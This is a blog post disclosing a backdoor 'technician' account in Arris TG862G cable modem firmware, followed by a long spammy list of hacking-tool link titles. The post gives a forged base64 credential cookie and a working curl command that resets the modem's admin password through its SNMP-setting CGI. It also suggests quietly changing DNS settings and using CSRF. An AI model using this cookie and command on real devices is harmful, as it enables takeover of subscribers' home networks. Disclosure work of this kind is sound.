Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW
After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}And finally:
{"credential":"technician:"}Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(
That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.
Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:
That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:
Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OKWhat about setting a new value? Surely that will not work....
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:
This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.
The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this
Related posts
- Android Hack Tools Github
- Pentest Tools Free
- Pentest Tools Review
- Hacks And Tools
- Hack And Tools
- Tools Used For Hacking
- Kik Hack Tools
- Hak5 Tools
- Hack Tools 2019
- Pentest Box Tools Download
- Hacking Tools
- Hacking Tools Usb
- Hacking Tools Pc
- Hack Tool Apk No Root
- Hack Tools Online
- Free Pentest Tools For Windows
- Hack Tools For Ubuntu
- Hack Tool Apk
- Hacker Tools For Pc
- Hackers Toolbox
- Pentest Tools Find Subdomains
- Hacking Tools Download
- Best Hacking Tools 2020
- Android Hack Tools Github
- Pentest Tools Free
- Pentest Tools Alternative
- How To Hack
- Pentest Tools Url Fuzzer
- Hacking Tools For Windows Free Download
- Pentest Tools Website
- Hacker Security Tools
- Pentest Automation Tools
- Tools 4 Hack
- Pentest Tools Github
- Hacking Tools For Windows
- Hak5 Tools
- Growth Hacker Tools
- Pentest Tools Github
- What Is Hacking Tools
- Hacker Security Tools
- Pentest Tools Apk
- Hak5 Tools
- Pentest Tools Linux
- Hackrf Tools
- Growth Hacker Tools
- Hacking Tools Name
- Hacker Tools For Ios
- Best Pentesting Tools 2018
- Tools For Hacker
- Hacker Tools 2020
- Hack Tools
- Pentest Recon Tools
- Bluetooth Hacking Tools Kali
- Hacker Tools Online
- Termux Hacking Tools 2019
- Hack Tools For Ubuntu
- Pentest Tools Free
- Hacker Tools Apk Download
- Hacking App
- Hacking Tools Kit
- Hacker Tools Hardware
- Best Hacking Tools 2019
- Underground Hacker Sites
- Hacking Tools For Pc
- Hacker Tools Apk
- Underground Hacker Sites
- Install Pentest Tools Ubuntu
- Hacking Tools For Windows Free Download
- How To Hack
- Hacking Tools For Windows Free Download
- Hack App
- Hacker Tools For Mac
- Hack Tools For Games
- Pentest Tools Website Vulnerability
- Physical Pentest Tools
- Hacker Tools For Ios
- Growth Hacker Tools
- Best Hacking Tools 2020
- Pentest Tools Find Subdomains
- Usb Pentest Tools
- Hacking Tools Online
- Hacker Hardware Tools
- Kik Hack Tools
- Underground Hacker Sites
- Hacking Tools Windows
- Hack And Tools
- Hacker Tools Windows
- Hacking Tools Pc
- Hacker Tools Apk
- Pentest Tools Review
- Physical Pentest Tools
- Hack Tools For Pc
- Bluetooth Hacking Tools Kali
- Best Hacking Tools 2020
- Hacker Tools Apk Download
- New Hack Tools
- Pentest Tools For Mac
- What Are Hacking Tools
- Hacker Tools Software
- Hacker Tools Apk
- Best Hacking Tools 2020
- Hacker Tool Kit
- Pentest Tools For Windows
- Hacker Tools
- Hack Tools For Windows
- Pentest Tools Find Subdomains
- Hacker Tools Free Download
- Hack Tools Online
- Hacking Tools Mac
- Hacker Search Tools
- Hacking Tools Pc
- Pentest Tools Download
- Hacking Tools Download
- Pentest Tools Bluekeep
- Termux Hacking Tools 2019
- Nsa Hacker Tools
- Pentest Tools Online
- Physical Pentest Tools
- Hacker Tool Kit
- New Hack Tools
- Hack Website Online Tool
- Hacker Tools For Pc
- Pentest Tools Nmap
- Hack Tools For Games
- Hackrf Tools
- Pentest Tools Review
- Pentest Tools Nmap
- Pentest Tools Linux
- Growth Hacker Tools
- Hack Tool Apk
- Pentest Tools List
- Game Hacking
- Pentest Tools Online
- Hacking Tools For Kali Linux
- Install Pentest Tools Ubuntu
- Usb Pentest Tools
- Pentest Tools Android
- Hack Tools Pc
- Hacker Hardware Tools
- Pentest Automation Tools
- Top Pentest Tools
- Pentest Tools For Windows
- Hacking Tools And Software
- Free Pentest Tools For Windows
- How To Install Pentest Tools In Ubuntu
- Hacking Tools For Mac
- Hacking Tools Software
- Pentest Tools For Windows
- Pentest Tools Android
- Hacking Tools For Windows Free Download
- Pentest Tools Website
- Pentest Tools Github
- Pentest Tools Nmap
- Hacker Tools Hardware
- Free Pentest Tools For Windows
- Hacking Tools Hardware
- Hacker Tools 2019
No comments:
Post a Comment